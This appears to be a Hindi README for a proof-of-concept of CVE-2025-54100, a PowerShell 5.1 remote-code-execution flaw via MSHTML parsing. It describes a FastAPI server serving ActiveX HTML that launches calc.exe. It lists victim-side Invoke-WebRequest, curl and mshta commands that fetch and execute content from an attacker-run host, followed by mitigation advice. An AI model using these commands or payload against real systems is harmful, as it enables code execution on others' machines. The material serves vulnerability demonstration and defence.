
CVE-2025-54100(PowerShell दूरस्थ कोड निष्पादन भेद्यता)
दर्शाता है कि कैसे CVE-2025-54100 दुर्भावनापूर्ण HTML पार्सिंग के माध्यम से Windows PowerShell 5.1 में रिमोट कोड एक्ज़ीक्यूशन (RCE) का कारण बनता है।
भेद्यता प्रकार: जब Invoke-WebRequest -UseBasicParsing पैरामीटर का उपयोग नहीं करता तो कमांड इंजेक्शन जोखिम मौजूद होता है
गंभीरता स्तर: CVSS 7.8 (उच्च जोखिम)
मूल कारण: MSHTML-आधारित HTML प्रतिक्रिया पार्सिंग स्क्रिप्ट निष्पादन (जैसे ActiveXObject) की अनुमति देता है, और यह कॉलर के संदर्भ में चलता है
प्रभावित सिस्टम:
CVE-2025-54100.py में FastAPI सर्वर एक विशेष रूप से तैयार किया गया HTML पेलोड लौटाता हैWScript.Shell / Shell.Application जैसे ActiveX ऑब्जेक्ट को इंस्टैंशिएट करने का प्रयास करती हैcalc.exe लॉन्च करके रिमोट कोड एक्ज़ीक्यूशन प्रदर्शित करता हैpython3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
PoC HTTP सेवा प्रारंभ करें:
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
भेद्यता वाले Windows होस्ट पर, -UseBasicParsing का उपयोग न करें, निम्नलिखित कमांड निष्पादित करें:
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.26.16:8888"
# curl(PowerShell 中的别名)
curl http://192.168.26.16:8888
# mshta
mshta http://192.168.26.16:8888
सुनिश्चित करें कि पोर्ट सर्वर कॉन्फ़िगरेशन से मेल खाता है। यदि सिस्टम में भेद्यता मौजूद है, तो एम्बेडेड स्क्रिप्ट MSHTML पार्सर के माध्यम से निष्पादित की जाएगी।
नोट: कुछ एंटीवायरस सॉफ़्टवेयर इस व्यवहार को ब्लॉक कर सकते हैं, भले ही पार्सिंग भेद्यता स्वयं अभी भी मौजूद हो।
calc.exe पॉप अप नहीं होता है:
-UseBasicParsing का उपयोग किए बिना Invoke-WebRequest फिर से निष्पादित करेंयह चरण निष्पादन वेक्टर को सत्यापित करने के लिए है। वास्तविक हमले के परिदृश्यों में, हमलावर डिफ़ॉल्ट सुरक्षा प्रतिबंधों को दरकिनार करने के लिए अस्पष्टीकरण या बाईपास तकनीकों का उपयोग कर सकते हैं।

माइक्रोसॉफ्ट ने दिसंबर 2025 में इस भेद्यता को ठीक कर दिया है:
Windows सुरक्षा अपडेट समय पर इंस्टॉल करें
MSHTML पार्सिंग से बचने के लिए हमेशा -UseBasicParsing का उपयोग करें:
Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
PowerShell 7+ (pwsh) पर माइग्रेट करें, PowerShell Core अब पार्सिंग के लिए MSHTML पर निर्भर नहीं है, जो आर्किटेक्चरल रूप से इस समस्या से बचाता है।